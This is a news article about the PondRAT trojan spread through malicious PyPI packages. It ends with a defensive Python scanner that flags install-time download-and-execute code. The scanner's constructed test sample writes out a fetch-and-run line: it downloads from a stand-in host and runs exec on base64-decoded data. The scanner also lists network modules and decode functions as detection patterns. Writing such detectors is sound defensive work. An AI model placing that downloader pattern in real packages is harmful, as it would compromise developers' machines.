
New PondRAT Malware Hidden in Python Packages Targets Software Developers in Latest Supply Chain Attack


A newly discovered strain of malware, PondRAT, has been found hidden in Python packages on the PyPI repository, posing a serious threat to software developers, especially those working on macOS and Linux systems. This attack, attributed to North Korean threat actors linked to the notorious Lazarus Group, is part of a broader campaign targeting developers through supply chain attacks.

PondRAT is a remote access trojan (RAT) that allows attackers to upload and download files, execute arbitrary commands, and pause operations on infected systems. The malware was found in several seemingly legitimate Python packages, such as “real-ids,” “coloredtxt,” and “beautifultext,” which unsuspecting developers might have downloaded and installed from PyPI. Once these packages are installed, they retrieve the malicious PondRAT payload from a remote server and compromise the developer’s system.

This attack is particularly concerning because it targets the software supply chain, potentially giving attackers access not only to individual developers but also to the broader network of vendors and customers reliant on compromised code. This kind of infiltration could lead to widespread disruptions and data breaches.

PondRAT is closely related to another piece of malware, POOLRAT, and both share similar capabilities. The Lazarus Group’s ongoing activities demonstrate a high level of sophistication in leveraging open-source platforms like PyPI for malicious purposes. The removal of the infected packages from the repository has mitigated immediate threats, but this incident underscores the need for developers and organizations to strengthen their security practices. Vetting third-party code, using private repositories, and implementing advanced threat detection tools are key steps to protect against such attacks.
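As an added illustration of the "vetting third-party code" advice, and of the install-time fetch-and-run behaviour described earlier (example code written for this page, not from the article or any vendor tool), here is a small static check over a package's setup.py. It flags the ingredients of that pattern: network-capable imports, decoding of an encoded blob, dynamic exec/eval on non-literal input, and custom setuptools install hooks. The sample inputs are constructed and are not PondRAT code.

```python
import ast

# Heuristics for the install-time pattern in the article: code that reaches a remote server and runs what it fetched.
NETWORK_MODULES = {"urllib.request", "requests", "socket", "http.client"}
DECODE_FUNCS = {"b64decode", "b32decode", "unhexlify"}

def _call_name(call: ast.Call) -> str:
    """Dotted name of a call target, e.g. 'base64.b64decode'."""
    parts, node = [], call.func
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))

def scan_source(src: str, filename: str = "setup.py") -> list[str]:
    """Static scan of one Python file; returns findings a reviewer should inspect by hand."""
    findings = []
    for node in ast.walk(ast.parse(src, filename)):
        if isinstance(node, ast.Import):
            mods = [a.name for a in node.names]
        elif isinstance(node, ast.ImportFrom):
            mods = [node.module or ""]
        elif isinstance(node, ast.Call):
            mods = []
            name = _call_name(node)
            if name in ("exec", "eval") and not (node.args and isinstance(node.args[0], ast.Constant)):
                findings.append(f"{filename}:{node.lineno} {name}() on non-literal input")
            if name.rsplit(".", 1)[-1] in DECODE_FUNCS:
                findings.append(f"{filename}:{node.lineno} decodes a blob via {name}")
            if name == "setup" and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append(f"{filename}:{node.lineno} setup() registers a custom cmdclass hook")
        else:
            continue
        for m in mods:  # import of a network-capable module at install time
            if any(m == n or m.startswith(n + ".") for n in NETWORK_MODULES):
                findings.append(f"{filename}:{node.lineno} imports network module {m}")
    return findings

# Constructed sample inputs (not PondRAT code): an install-time downloader shape, and an ordinary setup.py.
SUSPICIOUS_SETUP_PY = (
    "import urllib.request, base64\n"
    "from setuptools import setup\n"
    "blob = urllib.request.urlopen('http://example.invalid/stage').read()\n"
    "exec(base64.b64decode(blob))\n"
    "setup(name='sample-pkg', version='0.1')\n"
)
CLEAN_SETUP_PY = "from setuptools import setup\nsetup(name='sample-pkg', version='0.1')\n"
```

Run `scan_source` over setup.py and the package's `__init__.py` before installing from an unfamiliar publisher; a hit is a prompt for manual review, not proof of malice.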

In this evolving threat landscape, vigilance is critical for developers to safeguard their systems and the broader supply chain against future attacks. This incident serves as a stark reminder of the growing risks in the open-source ecosystem.
